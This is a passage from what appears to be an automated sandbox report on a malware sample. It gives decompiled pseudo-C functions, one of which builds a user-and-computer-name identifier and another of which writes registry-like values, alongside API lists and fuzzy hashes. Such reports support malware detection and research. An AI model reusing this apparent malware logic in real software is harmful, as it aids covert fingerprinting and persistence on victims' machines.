                                                                                                                                  						L29:
                                                                                                                                  						_t60 = _a20;
                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                  							 *_t60 =  *_t60 + 1;
                                                                                                                                  						}
                                                                                                                                  						return _v8;
                                                                                                                                  					}
                                                                                                                                  					_t101 = _a24;
                                                                                                                                  					if(E022B8C52(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                                                                                                  						L27:
                                                                                                                                  						E022B8B22(_a8);
                                                                                                                                  						goto L29;
                                                                                                                                  					}
                                                                                                                                  					_t64 =  *0x22bd278; // 0x4779c18
                                                                                                                                  					_t16 = _t64 + 0xc; // 0x4779d3a
                                                                                                                                  					_t65 = E022B7B3B(_t64,  *_t16);
                                                                                                                                  					_a24 = _t65;
                                                                                                                                  					if(_t65 == 0) {
                                                                                                                                  						L14:
                                                                                                                                  						_t29 = _t101 + 0x14; // 0x102
                                                                                                                                  						_t33 = _t101 + 0x10; // 0x3d022bc0
                                                                                                                                  						if(E022BA38F(_t97,  *_t33, _t91, _a8,  *0x22bd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                                                                                                  							_t68 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  							if(_t98 == 0) {
                                                                                                                                  								_t35 = _t68 + 0x22bea3f; // 0x4d4c4b48
                                                                                                                                  								_t69 = _t35;
                                                                                                                                  							} else {
                                                                                                                                  								_t34 = _t68 + 0x22be8e7; // 0x55434b48
                                                                                                                                  								_t69 = _t34;
                                                                                                                                  							}
                                                                                                                                  							if(E022B8F85(_t69,  *0x22bd334,  *0x22bd338,  &_a24,  &_a16) == 0) {
                                                                                                                                  								if(_t98 == 0) {
                                                                                                                                  									_t71 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  									_t44 = _t71 + 0x22be846; // 0x74666f53
                                                                                                                                  									_t73 = E022B7B3B(_t44, _t44);
                                                                                                                                  									_t99 = _t73;
                                                                                                                                  									if(_t73 == 0) {
                                                                                                                                  										_v8 = 8;
                                                                                                                                  									} else {
                                                                                                                                  										_t47 = _t101 + 0x10; // 0x3d022bc0
                                                                                                                                  										E022B4538( *_t47, _t91, _a8,  *0x22bd338, _a24);
                                                                                                                                  										_t49 = _t101 + 0x10; // 0x3d022bc0
                                                                                                                                  										E022B4538( *_t49, _t91, _t99,  *0x22bd330, _a16);
                                                                                                                                  										E022B8B22(_t99);
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_t40 = _t101 + 0x10; // 0x3d022bc0
                                                                                                                                  									E022B4538( *_t40, _t91, _a8,  *0x22bd338, _a24);
                                                                                                                                  									_t43 = _t101 + 0x10; // 0x3d022bc0
                                                                                                                                  									E022B4538( *_t43, _t91, _a8,  *0x22bd330, _a16);
                                                                                                                                  								}
                                                                                                                                  								if( *_t101 != 0) {
                                                                                                                                  									E022B8B22(_a24);
                                                                                                                                  								} else {
                                                                                                                                  									 *_t101 = _a16;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L27;
                                                                                                                                  					}
                                                                                                                                  					_t21 = _t101 + 0x10; // 0x3d022bc0
                                                                                                                                  					_t81 = E022B7DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                                                                                                  					if(_t81 == 0) {
                                                                                                                                  						_t100 = _v16;
                                                                                                                                  						if(_v12 == 0x28) {
                                                                                                                                  							 *_t100 =  *_t100 & _t81;
                                                                                                                                  							_t26 = _t101 + 0x10; // 0x3d022bc0
                                                                                                                                  							E022BA38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                                                                                                  						}
                                                                                                                                  						E022B8B22(_t100);
                                                                                                                                  						_t98 = _a16;
                                                                                                                                  					}
                                                                                                                                  					E022B8B22(_a24);
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                  					goto L29;
                                                                                                                                  				} else {
                                                                                                                                  					_t97 = _a8;
                                                                                                                                  					E022BA789(_t98, _a8,  &_v284);
                                                                                                                                  					__imp__(_t102 + _t98 - 0x117,  *0x22bd33c);
                                                                                                                                  					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                                                                                                  					_t91 = 0x80000003;
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  			}
























                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(022B9900,0000005F,00000000,00000000,00000104), ref: 022B4B5D
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 022B4B8A
                                                                                                                                    • Part of subcall function 022B7B3B: lstrlen.KERNEL32(?,00000000,04779C18,00000000,022B5142,04779E3B,?,?,?,?,?,69B25F44,00000005,022BD00C), ref: 022B7B42
                                                                                                                                    • Part of subcall function 022B7B3B: mbstowcs.NTDLL ref: 022B7B6B
                                                                                                                                    • Part of subcall function 022B7B3B: memset.NTDLL ref: 022B7B7D
                                                                                                                                    • Part of subcall function 022B4538: lstrlenW.KERNEL32(?,?,?,022B4CF3,3D022BC0,80000002,022B9900,022B5C8D,74666F53,4D4C4B48,022B5C8D,?,3D022BC0,80000002,022B9900,?), ref: 022B455D
                                                                                                                                    • Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E
                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B4BAC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                  • String ID: ($\
                                                                                                                                  • API String ID: 3924217599-1512714803
                                                                                                                                  • Opcode ID: 574a244d4f1fde2d328a8ed0795f4d2b2ed177d1604b470d35ee9f45aa73eb44
                                                                                                                                  • Instruction ID: a098dc424035b969a399fe591ab368c2cd9612175aee1f6271a438a6564d6ed7
                                                                                                                                  • Opcode Fuzzy Hash: 574a244d4f1fde2d328a8ed0795f4d2b2ed177d1604b470d35ee9f45aa73eb44
                                                                                                                                  • Instruction Fuzzy Hash: C7516B7252020AAFDF13AFE0EC94EEA7BBAEF44394F008914F9559612AD731D925DF10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 0$9
                                                                                                                                  • API String ID: 3120068967-1975997740
                                                                                                                                  • Opcode ID: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
                                                                                                                                  • Instruction ID: 6361b81019eb8333fad45a4e855a4514e7448bc63b8c1a38007d0fd3dc644a85
                                                                                                                                  • Opcode Fuzzy Hash: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
                                                                                                                                  • Instruction Fuzzy Hash: 28412871E05228DFDB20CF58D889BAEB7B1FB84304F5481DAD449A7240C7389E91CF4A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$9
                                                                                                                                  • API String ID: 3120068967-1823400153
                                                                                                                                  • Opcode ID: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
                                                                                                                                  • Instruction ID: a4ab00b61622b96220ac56cbfdb55f28e6a07888e9126e169b7f4c36ff8b525d
                                                                                                                                  • Opcode Fuzzy Hash: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
                                                                                                                                  • Instruction Fuzzy Hash: 5E4124B1E00229DFDB24CF48D881BAEB7B5FF85314F50849AD549AB200C7789E81CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E022B9FF6() {
                                                                                                                                  				void* _v0;
                                                                                                                                  				void** _t3;
                                                                                                                                  				void** _t5;
                                                                                                                                  				void** _t7;
                                                                                                                                  				void** _t8;
                                                                                                                                  				void* _t10;
                                                                                                                                  
                                                                                                                                  				_t3 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  				__imp__( &(_t3[0x10]));
                                                                                                                                  				while(1) {
                                                                                                                                  					_t5 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                  					if( *_t1 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					Sleep(0xa);
                                                                                                                                  				}
                                                                                                                                  				_t7 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  				_t10 =  *_t7;
                                                                                                                                  				if(_t10 != 0 && _t10 != 0x22be81a) {
                                                                                                                                  					HeapFree( *0x22bd238, 0, _t10);
                                                                                                                                  					_t7 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  				}
                                                                                                                                  				 *_t7 = _v0;
                                                                                                                                  				_t8 =  &(_t7[0x10]);
                                                                                                                                  				__imp__(_t8);
                                                                                                                                  				return _t8;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(04779570), ref: 022B9FFF
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,022B30F3), ref: 022BA009
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,022B30F3), ref: 022BA037
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(04779570), ref: 022BA04C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 50eaff3c091971243e7131359e4148fb09dfbb40894079aa16f3b0ef6a4092ed
                                                                                                                                  • Instruction ID: 7d932b2c0eb05c41dd585c65ba7ed001716a2b63672b21da1326dad9931da57c
                                                                                                                                  • Opcode Fuzzy Hash: 50eaff3c091971243e7131359e4148fb09dfbb40894079aa16f3b0ef6a4092ed
                                                                                                                                  • Instruction Fuzzy Hash: E2F0B278A941419FE72A8BE4E84DFA577E4AF08384B488C09E942CB265C734AC60CE21
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B9267() {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				long _t39;
                                                                                                                                  				long _t43;
                                                                                                                                  				signed int _t47;
                                                                                                                                  				short _t51;
                                                                                                                                  				signed int _t52;
                                                                                                                                  				int _t56;
                                                                                                                                  				int _t57;
                                                                                                                                  				char* _t64;
                                                                                                                                  				short* _t67;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				GetUserNameW(0,  &_v8);
                                                                                                                                  				_t39 = _v8;
                                                                                                                                  				if(_t39 != 0) {
                                                                                                                                  					_v12 = _t39;
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					GetComputerNameW(0,  &_v8);
                                                                                                                                  					_t43 = _v8;
                                                                                                                                  					if(_t43 != 0) {
                                                                                                                                  						_v12 = _v12 + _t43 + 2;
                                                                                                                                  						_t64 = E022B1525(_v12 + _t43 + 2 << 2);
                                                                                                                                  						if(_t64 != 0) {
                                                                                                                                  							_t47 = _v12;
                                                                                                                                  							_t67 = _t64 + _t47 * 2;
                                                                                                                                  							_v8 = _t47;
                                                                                                                                  							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                                                                                                  								L7:
                                                                                                                                  								E022B8B22(_t64);
                                                                                                                                  							} else {
                                                                                                                                  								_t51 = 0x40;
                                                                                                                                  								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                                                                                                  								_t52 = _v8;
                                                                                                                                  								_v12 = _v12 - _t52;
                                                                                                                                  								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                                                                                                  									goto L7;
                                                                                                                                  								} else {
                                                                                                                                  									_t56 = _v12 + _v8;
                                                                                                                                  									_t31 = _t56 + 2; // 0x22b9cb2
                                                                                                                                  									_v12 = _t56;
                                                                                                                                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                                                                                                  									_v8 = _t57;
                                                                                                                                  									if(_t57 == 0) {
                                                                                                                                  										goto L7;
                                                                                                                                  									} else {
                                                                                                                                  										_t64[_t57] = 0;
                                                                                                                                  										_v16 = _t64;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v16;
                                                                                                                                  			}
















                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,022B9CB0), ref: 022B927B
                                                                                                                                  • GetComputerNameW.KERNEL32(00000000,022B9CB0), ref: 022B9297
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • GetUserNameW.ADVAPI32(00000000,022B9CB0), ref: 022B92D1
                                                                                                                                  • GetComputerNameW.KERNEL32(022B9CB0,?), ref: 022B92F4
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,022B9CB0,00000000,022B9CB2,00000000,00000000,?,?,022B9CB0), ref: 022B9317
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850880919-0
                                                                                                                                  • Opcode ID: 133e655d7b9a55bf846b051f51647740f202c748c45396805898d11f3ad2f372
                                                                                                                                  • Instruction ID: 3b56bbf0ac871cddeba5afa76988534f86cde8ee1bf06dd8555af6f33b6f8dbf
                                                                                                                                  • Opcode Fuzzy Hash: 133e655d7b9a55bf846b051f51647740f202c748c45396805898d11f3ad2f372
                                                                                                                                  • Instruction Fuzzy Hash: C921D776D10209FFCB12DFE8D9889EEBBB8EF44344B5448AAE601E7244D7309B55DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B9EBB(intOrPtr _a4) {
                                                                                                                                  				void* _t2;
                                                                                                                                  				unsigned int _t4;
                                                                                                                                  				void* _t5;
                                                                                                                                  				long _t6;
                                                                                                                                  				void* _t7;
                                                                                                                                  				void* _t15;
                                                                                                                                  
                                                                                                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                  				 *0x22bd26c = _t2;
                                                                                                                                  				if(_t2 == 0) {
                                                                                                                                  					return GetLastError();
                                                                                                                                  				}
                                                                                                                                  				_t4 = GetVersion();
                                                                                                                                  				if(_t4 != 5) {
                                                                                                                                  					L4:
                                                                                                                                  					if(_t15 <= 0) {
                                                                                                                                  						_t5 = 0x32;
                                                                                                                                  						return _t5;
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					 *0x22bd25c = _t4;
                                                                                                                                  					_t6 = GetCurrentProcessId();
                                                                                                                                  					 *0x22bd258 = _t6;
                                                                                                                                  					 *0x22bd264 = _a4;
                                                                                                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                  					 *0x22bd254 = _t7;
                                                                                                                                  					if(_t7 == 0) {
                                                                                                                                  						 *0x22bd254 =  *0x22bd254 | 0xffffffff;
                                                                                                                                  					}
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				if(_t4 >> 8 > 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				_t15 = _t4 - _t4;
                                                                                                                                  				goto L4;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,022B27C3,?,?,00000001,?,?,?,022B7F25,?), ref: 022B9EC3
                                                                                                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B9ED2
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B9EEE
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B9F0B
                                                                                                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B9F2A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2270775618-0
                                                                                                                                  • Opcode ID: 60b86161555d5a1f1d5075df6f3da9df8a18eed635b06f99c02ba075fcd79974
                                                                                                                                  • Instruction ID: d2d0e8bfe920072d2ae5395c0c836458f94e37d06480588f6f4e0ce5b4c931ee
                                                                                                                                  • Opcode Fuzzy Hash: 60b86161555d5a1f1d5075df6f3da9df8a18eed635b06f99c02ba075fcd79974
                                                                                                                                  • Instruction Fuzzy Hash: 4AF06D74EE43839FD7138BE4B91DB953B60AB40795F004D16F642C61C6EBB480A1CF15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$__invalid_parameter
                                                                                                                                  • String ID: P
                                                                                                                                  • API String ID: 2178901135-3110715001
                                                                                                                                  • Opcode ID: 36afb094fbf91bde458c9f04504b5550f94f71234a4dc47069f13a2b3c191332
                                                                                                                                  • Instruction ID: ff1ab50e4a8da51c6aed1eb7c42e00a9d86741e526bb0bae16782f3d79194faf
                                                                                                                                  • Opcode Fuzzy Hash: 36afb094fbf91bde458c9f04504b5550f94f71234a4dc47069f13a2b3c191332
                                                                                                                                  • Instruction Fuzzy Hash: 1341BC30A08219EBCB14DF58E8457AE7771FB00324F64C66AEC255B3D1C3799951CF99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
                                                                                                                                  • Instruction ID: 60bf2d10f6abf1674f58a41acd4e22dac65445bd2313a9a7bb887a148b80a0ea
                                                                                                                                  • Opcode Fuzzy Hash: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
                                                                                                                                  • Instruction Fuzzy Hash: E54135B0E10229DFDB20CF48D881BAEB7B4FF85314F50849AD549AB200C7785E81CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
                                                                                                                                  • Instruction ID: 84d6122f9c34beccd58d4e428a6470208c4d691562115a695ee842527cb5fd4f
                                                                                                                                  • Opcode Fuzzy Hash: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
                                                                                                                                  • Instruction Fuzzy Hash: C6411775E01229DFDB24CF58DC89BAEB7B5FB84304F54819AD449A7240C7389E91CF49
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3120068967-2366072709
                                                                                                                                  • Opcode ID: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
                                                                                                                                  • Instruction ID: 2bf944a235f93b1e4b29e10379b60506258713ca41dfca8dc5a8c42121dde725
                                                                                                                                  • Opcode Fuzzy Hash: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
                                                                                                                                  • Instruction Fuzzy Hash: 194116B1E40129DFDB24CF48D981BAEB7B5FF85310F50859AD589A7201C7385E81CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
                                                                                                                                  • Instruction ID: b7c93e90d767784c0932de63ac21d0d2f3b6555ccbfcb1aa7ad353ad6b8bf28d
                                                                                                                                  • Opcode Fuzzy Hash: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
                                                                                                                                  • Instruction Fuzzy Hash: F24124B1A40129DFDB20CF48D981BAEB7B4FB85310F5085DAE549A7200C7385E80CF1A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 2124759748-2366072709
                                                                                                                                  • Opcode ID: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
                                                                                                                                  • Instruction ID: 3f55e8fff515ffad3fab03126948b95154aeb57b676acdd403ae9f4bdb469bca
                                                                                                                                  • Opcode Fuzzy Hash: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
                                                                                                                                  • Instruction Fuzzy Hash: 1F410775E05228DFDB24CF58D889BAEB7B5FB84304F5481DAD449A7240C7389E91CF4A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00426164
                                                                                                                                  • __invalid_parameter.LIBCMTD ref: 004261FD
                                                                                                                                  • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042620F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$UpdateUpdate::~___invalid_parameter_memset
                                                                                                                                  • String ID: u!h8d@
                                                                                                                                  • API String ID: 255745848-3039543186
                                                                                                                                  • Opcode ID: 2b49365f5bff4aac0e7ca6481663ff2a9a328998f6363769a4adc87676ce7d20
                                                                                                                                  • Instruction ID: 4d3d35df8eda1f27d7a90ee0b940f25f0450abaaa7a428bd50e7309c433467cc
                                                                                                                                  • Opcode Fuzzy Hash: 2b49365f5bff4aac0e7ca6481663ff2a9a328998f6363769a4adc87676ce7d20
                                                                                                                                  • Instruction Fuzzy Hash: 5231A070B00219DBCB24CF58DC42BEE7371BB00304F62862AF825673D2D779A961CB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E022B4E05(intOrPtr* __eax) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				WCHAR* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void* _v32;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				short _v48;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				short _v64;
                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				intOrPtr* _t58;
                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				intOrPtr* _t63;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				short _t67;
                                                                                                                                  				intOrPtr* _t68;
                                                                                                                                  				intOrPtr* _t70;
                                                                                                                                  				intOrPtr* _t72;
                                                                                                                                  				intOrPtr* _t75;
                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                  				intOrPtr _t79;
                                                                                                                                  				intOrPtr* _t83;
                                                                                                                                  				intOrPtr* _t87;
                                                                                                                                  				intOrPtr _t103;
                                                                                                                                  				intOrPtr _t109;
                                                                                                                                  				void* _t118;
                                                                                                                                  				void* _t122;
                                                                                                                                  				void* _t123;
                                                                                                                                  				intOrPtr _t130;
                                                                                                                                  
                                                                                                                                  				_t123 = _t122 - 0x3c;
                                                                                                                                  				_push( &_v8);
                                                                                                                                  				_push(__eax);
                                                                                                                                  				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                                                  				if(_t118 >= 0) {
                                                                                                                                  					_t54 = _v8;
                                                                                                                                  					_t103 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					_t5 = _t103 + 0x22be038; // 0x3050f485
                                                                                                                                  					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                  					_t56 = _v8;
                                                                                                                                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                  					if(_t118 >= 0) {
                                                                                                                                  						__imp__#2(0x22bc290);
                                                                                                                                  						_v28 = _t57;
                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                  							_t118 = 0x8007000e;
                                                                                                                                  						} else {
                                                                                                                                  							_t60 = _v32;
                                                                                                                                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                  							_t87 = __imp__#6;
                                                                                                                                  							_t118 = _t61;
                                                                                                                                  							if(_t118 >= 0) {
